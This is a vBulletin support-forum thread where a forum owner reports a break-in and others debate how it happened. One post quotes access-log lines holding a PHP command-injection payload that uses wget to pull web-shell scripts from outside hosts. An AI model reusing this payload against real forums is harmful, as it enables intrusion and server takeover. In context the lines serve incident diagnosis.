I beleive it was through vB cause they deleted admincp and include. I don't have the most recent version, but I have done all the security upgrades. THey were also able to upload php files. How would this have been done? This is the first time in almost 4.5 years!
was just hacked
Collapse
X
-
Tags: None
-
Its impossible to delete any files via vB, your server and or passwords have been comprimised. -
If they were able to delete directories and upload files, then your server was probably compromised. You should change all server passwords and update your server software. Contact your host to see if they can examine your logs and come to any conclusion about what happened.Comment
-
it wasn't through the server. I have my admin guy going through it. they only targetted my vb directory.
I wouldn't say it's impossible either.Comment
-
Unless you have a hack, it is near impossible to use vBulletin to delete files, its notwithin vB's builtin ability to do so.
ftp or other system access has been comprimised.Comment
-
Originally posted by 7thgencivic.comit wasn't through the server. I have my admin guy going through it. they only targetted my vb directory.
Originally posted by 7thgencivic.comI wouldn't say it's impossible either.
It is possible for PHP scripts to be written such that malicious users can inject system commands for execution. There are no such exploits in the current version of vBulletin. Also, vB3 was coded with security in mind. So unless this is a new exploit in vBulletin, then your directories were deleted by some other means.Comment
-
Assuming you did not enable HTML in posts or sigs, and did not install a hack with a significant vunerability, then there is no way someone could have deleted directories and files on your server through vB.Steve Machol, former vBulletin Customer Support Manager (and NOT retired!)
Change CKEditor Colors to Match Style (for 4.1.4 and above)
Steve Machol Photography
Mankind is the only creature smart enough to know its own history, and dumb enough to ignore it.
Comment
-
well, i just found these in my logs
Code:/forums/forumdisplay.php?f=3&GLOBALS[]=1&comma={${system($cmd)}}{${exit()}}&cmd=wget%20http://myweb.saudi.net.sa/shell.php /forums/forumdisplay.php?f=3&GLOBALS[]=1&comma={${system($cmd)}}{${exit()}}&cmd=wget%20http://www.freewebtown.com/haa3/supershell.php
Comment
-
-
Can we get access to your forums?
Fill out a support ticket at:
http://www.vbulletin.com/members/me...contactform.php
Be sure to include the login info to your Admin CP, phpMyAdmin and FTP.
Comment
-
-
Is there any reason you just don't upgrade to 3.0.7? If you have hacks installed then we are limiited in how much help we can provide.Steve Machol, former vBulletin Customer Support Manager (and NOT retired!)
Change CKEditor Colors to Match Style (for 4.1.4 and above)
Steve Machol Photography
Mankind is the only creature smart enough to know its own history, and dumb enough to ignore it.
Comment
-
i do have hacks. I don't know too many sites that don't. u can only go so far on a stock install and ppl will get bored.
If this was fixed already, please let me know where to get the update.
I was going to wait for 3.5 and redo it all from there.Comment
-
7thgencivic you'd be suprised, there is an insanely large part of our client base that does not modifiy their forums period. Hacked boards are a miniorty. And you do not need hacks to keep a board active
We would need to see server logs to be able to tell how they got in specificly.
If you did get effected by that shell script its not going to be fun cleaning.Comment
widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
Comment